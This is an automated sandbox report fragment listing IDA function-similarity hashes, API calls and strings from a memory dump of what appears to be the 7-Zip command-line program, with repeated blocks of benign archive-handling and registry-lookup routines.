                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                                                                                                                                                                                                                          • Instruction ID: f8a210de40a63e35f25f62d804fa5acd2a134e3ac544d15fff79524f18b783de
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DF0B42234A59099CA1AFF32C4956AF6750FBCBF80F042171EB4E67725CF28C456C304
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                                                                                                                                                                                          • Instruction ID: 6efc4da316d6826ddab5bfb1c32532d54f3adb0d22a8ce8ec33f8d0c206773d9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76F0542224A98059CA1AFF32C4A56AF6720FBCBF85F051171EF5E27711CE28C496C304
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                                                                                                                                                                                          • Instruction ID: 7b9e020f423689dd9baa656972d31baf4b545e1976c6c582b24424955f945a85
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10F05B2224A98159CA1AFF32C85566F6720F7CBF81F051171AF4F67711CE38C456C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                                                                                                                                                                                          • Instruction ID: 13b08ce68b1c66187dfa075343fa4ccbae5155c6833852337ac8d90f4ce15404
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CF0542224A58099CA1AFF32C4A56AF6720FBCBF81F051171AF4E27711CE28C456C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$fputsmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 469995913-0
                                                                                                                                                                                                                                          • Opcode ID: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                                                                                                                                                                                                                          • Instruction ID: 0a9685a58285b5eae0c342c7d427b8ab6092f939525d5074b6d11f5ed71d2797
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77F0D62225194095C759FF31D8525AF6321E7CBF68B045371AF6D5F3A9CE20C4A7C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
                                                                                                                                                                                                                                          • API String ID: 1294909896-2104980125
                                                                                                                                                                                                                                          • Opcode ID: e608d69ddf76c65373c44b70f7ae3aeb3f136de1000bdcda8d63e8efa4483270
                                                                                                                                                                                                                                          • Instruction ID: 1912b74b6c066da34125643912eb55f1a46d8f291076417c6d14aee2d0459bcd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e608d69ddf76c65373c44b70f7ae3aeb3f136de1000bdcda8d63e8efa4483270
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B511662214AD0A6CF3BEF25D4402EE7766F38A798F848621D79A4B755EF34C5C6C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • free.MSVCRT ref: 003204EE
                                                                                                                                                                                                                                            • Part of subcall function 0031FEC8: _CxxThrowException.MSVCRT ref: 0031FF2F
                                                                                                                                                                                                                                            • Part of subcall function 0031FEC8: free.MSVCRT ref: 0031FFAE
                                                                                                                                                                                                                                            • Part of subcall function 0031FEC8: _CxxThrowException.MSVCRT ref: 0031FFD1
                                                                                                                                                                                                                                            • Part of subcall function 0031FEC8: _CxxThrowException.MSVCRT ref: 0031FFF7
                                                                                                                                                                                                                                            • Part of subcall function 0031FEC8: _CxxThrowException.MSVCRT ref: 0032002B
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00320523
                                                                                                                                                                                                                                          • _CxxThrowException.MSVCRT ref: 00320564
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionThrow$free
                                                                                                                                                                                                                                          • String ID: Incorrect wildcard type marker$Too short switch
                                                                                                                                                                                                                                          • API String ID: 3129652135-1817034180
                                                                                                                                                                                                                                          • Opcode ID: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                                                                                                                                                                                                                          • Instruction ID: d37779105f9322adb8214ade990174d12534aab7fb0ed1b41f90598de4943cb5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4251D5332086E495CB2AEF26F45079EBB34F386B94F558116EF8907B56DB38C589CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memmove
                                                                                                                                                                                                                                          • String ID: #
                                                                                                                                                                                                                                          • API String ID: 1534225298-1885708031
                                                                                                                                                                                                                                          • Opcode ID: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                                                                                                                                                                                                                          • Instruction ID: abf69e13d3fd52c91103b361bff22e5e2fc1770ad4f9aaba9cd9793dba6c3ff3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3518126314B8482CB66CF26E4807AE7765F7C9B94F544221EB9E4B7A5DF3CD849C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memmove
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1534225298-0
                                                                                                                                                                                                                                          • Opcode ID: 5dbb136250ba67db7f9c767b0f337fdb521cef1fb26903d33d9bfc2baab15fa3
                                                                                                                                                                                                                                          • Instruction ID: 12733b136d908cab76f92c92bb1410ebf450b72d58aa06f3366763d08a20bf70
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5dbb136250ba67db7f9c767b0f337fdb521cef1fb26903d33d9bfc2baab15fa3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A21C82221594065CE2AEF24E8511DEA720EBCE7D0F541221FB5E4B7A9DF38C6C7C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                                                                                                                                                                                          • Instruction ID: ef3bf49bd73f0be94fcc18c2bb1ca09f2a609272b30e8f1be2122f96b7006bdd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e14598800cbc14b63090d73ae88cee87996ce6beccad5b2fb40a6b4c20696fd9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C11292330198499C716EF35D8516AE2320E7C7FA4F1943719F6D5B795CE24C897C314
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                                                                                                                                                                                                                          • Instruction ID: d9b78ef7013bc4c52291ce57587a4f470c5c36e6f3ce3771085d5179ca5add43
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68bdc44b06e71d8ca899e980b2fc608d9b8ec41ef539896fcf9a05c16de42b60
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7F031137118509DCB1AEF36DD515AD2320AB8BFD97194271AF1D5F365CE20C8E38380
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • free.MSVCRT ref: 003201D7
                                                                                                                                                                                                                                          • _CxxThrowException.MSVCRT ref: 003202EA
                                                                                                                                                                                                                                            • Part of subcall function 0031FD30: _CxxThrowException.MSVCRT ref: 0031FE50
                                                                                                                                                                                                                                          • _CxxThrowException.MSVCRT ref: 0032031F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • There is no second file name for rename pair:, xrefs: 00320302
                                                                                                                                                                                                                                          • Empty file path, xrefs: 003202CD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionThrow$free
                                                                                                                                                                                                                                          • String ID: Empty file path$There is no second file name for rename pair:
                                                                                                                                                                                                                                          • API String ID: 3129652135-1725603831
                                                                                                                                                                                                                                          • Opcode ID: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                                                                                                                                                                                          • Instruction ID: bb6babb38d041d79518817271d8227d9a596f584edb801de6a418d9518e36613
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D41E372208694C5CA3ADB19F84079E6720F39A7B4F504712DFB907BEADB39C599CB40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                          • Opcode ID: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                                                                                                                                                                                                                          • Instruction ID: 296bc8151b18d3a8f4e2ac0987e577e4f9ffe9ba0ed9b6ae8275a448ba2db2ee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF214167701E4089CB26DF35E4507696360EB86FA9F2A4321DF2D1B7A8DF35C846C350
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0031B544: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,Path64,003382CA), ref: 0031B56F
                                                                                                                                                                                                                                            • Part of subcall function 0031B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0031B4AA
                                                                                                                                                                                                                                            • Part of subcall function 0031B45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 0031B4F8
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00338343
                                                                                                                                                                                                                                            • Part of subcall function 00313404: free.MSVCRT ref: 00313431
                                                                                                                                                                                                                                            • Part of subcall function 00313404: memmove.MSVCRT ref: 0031344C
                                                                                                                                                                                                                                            • Part of subcall function 00318624: free.MSVCRT ref: 003186A9
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0033832B
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00338336
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$QueryValue$Openmemmove
                                                                                                                                                                                                                                          • String ID: 7z.dll$Software\7-zip
                                                                                                                                                                                                                                          • API String ID: 2771487249-1558686312
                                                                                                                                                                                                                                          • Opcode ID: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                                                                                                                                                                                                                          • Instruction ID: 6a3db05e5ce6064b2252247650903baa38191b33dd65c1bdf65eef587f929cd2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E11CA55304A4050CA26FB12D4513DEA725EBDABE0F845321BE5E4F766DF28C6CAC700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: fputs$free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3873070119-0
                                                                                                                                                                                                                                          • Opcode ID: 689b2ef2104b8583ad3e374e0ff24f5fd2d7cb2a6ea87d3443a7ff945e4a4c65
                                                                                                                                                                                                                                          • Instruction ID: dcb7616aaee1a43780eeebbf5b52599b2c912f7a937cdf32c53b398654146142
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 689b2ef2104b8583ad3e374e0ff24f5fd2d7cb2a6ea87d3443a7ff945e4a4c65
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B11606731494196DB21DF25E94076E6330F799BA5F404221FFAE47BB4DF28CA55C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeavefputs
                                                                                                                                                                                                                                          • String ID: ERROR:
                                                                                                                                                                                                                                          • API String ID: 4171338575-977468659
                                                                                                                                                                                                                                          • Opcode ID: 51b65b70fd9636ec3d92d8d392cf87c406234df2004214009f2d2c7c063ef683
                                                                                                                                                                                                                                          • Instruction ID: f4d1134dfb095ae23a5d3da1c35a8a3ff4e6fc061c70badd661fad7ded2c2809
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51b65b70fd9636ec3d92d8d392cf87c406234df2004214009f2d2c7c063ef683
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D111C172301D8185DB1BDF25EC007AD6325FB89FA6F588231DE6E0B6A4CF388599C310
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2252484179.0000000000311000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252462709.0000000000310000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252523994.000000000035F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252551941.000000000037C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2252574891.000000000037F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_310000_7z.jbxd
